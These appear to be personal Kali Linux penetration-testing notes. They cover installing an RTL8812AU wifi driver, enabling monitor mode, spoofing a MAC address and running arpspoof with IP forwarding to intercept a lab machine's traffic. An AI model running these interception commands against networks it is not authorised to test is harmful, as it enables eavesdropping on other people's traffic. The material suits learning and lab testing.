We use Kali Linux for penetration tests. It is also possible to use Ubuntu or other Linux distributions but we need to manually install many tools.
The RTL8812AU chipset requires a specific driver, and check if the driver is installed using the following command.
lsmod | grep 8812auIf the driver is not installed, install it with a simple apt install realtek-rtl88xxau-dkms.
sudo apt update
sudo apt install dkms build-essential linux-headers-$(uname -r) git
# Install the driver with this command. I almost spent 4 hours to find this line of command to make it work.
sudo apt install realtek-rtl88xxau-dkms
# The method below is recommended by many people but it does not work for the current version. The driver will make the wireless adaptor not able to show available networks.
git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
sudo make dkms_installThe above command may fail due to linux-header problems for a newly installed kali linux.
apt search linux-header
# The version can be a problem, install the one that can be found.
sudo apt install linux-header-6.11.2sudo iw dev wlan0 scan | grep SSID
sudo wpa_passphrase "Your_SSID" "Your_PASSWORD" > /etc/wpa_supplicant.conf
sudo wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant.conf
sudo dhclient wlan0Monitor mode allows your interface to get packets that are not meant to be sent to you in the network.
# Kill the network
airmon-ng check kill
# Set the interface to monitor mode
sudo iw dev wlan0 set type monitor
# old way
# sudo iwconfig wlan0 mode monitorUse the following commands to manually set the Mac Address for the wireless interface.
ip link show # check the wireless interface
sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant
sudo ip link set wlan0 down
# change the mode to monitor
sudo iw dev wlan0 set type monitor
# change the mac address: (1) has to be monitor mode; (2) other management program needs to be killed --- NetworkManager, wpa_supplicant
sudo ip link set dev wlan0 address 00:11:22:33:44:55
sudo ip link set wlan0 up
# check if the mode and MAC address is correct
sudo iw dev wlan0 infoThe old way is to use ifconfig, no longer recommended.
The recommended way is
ipandiwcommand.
sudo ifconfig wlan0 down
sudo ifconfig wlan0 hw ether 00:11:22:33:44:55
sudo ifconfig wlan0 upAdd the following two lines at the end of /etc/NetowrkManager/NetworkManager.conf file to prevent the Network Manager from resetting MAC address.
[device]
wifi.scan-rand-mac-address=no
[connection]
wifi.cloned-mac-address=preserveAfter gaining access to the network, we can target a machine and do ARP spoofing.
# enable port forwarding to make the target machine not sensible of us as a middle man.
sudo echo 1 > /proc/sys/net/ipv4/ip_forward# run the following two commands at the same time to become a middleman.
sudo arpspoof -i eth0 -t 192.168.211.130 192.168.211.1
sudo arpspoof -i eth0 -t 192.168.211.1 192.168.211.130In this way, all the traffic from the target machine will go through us.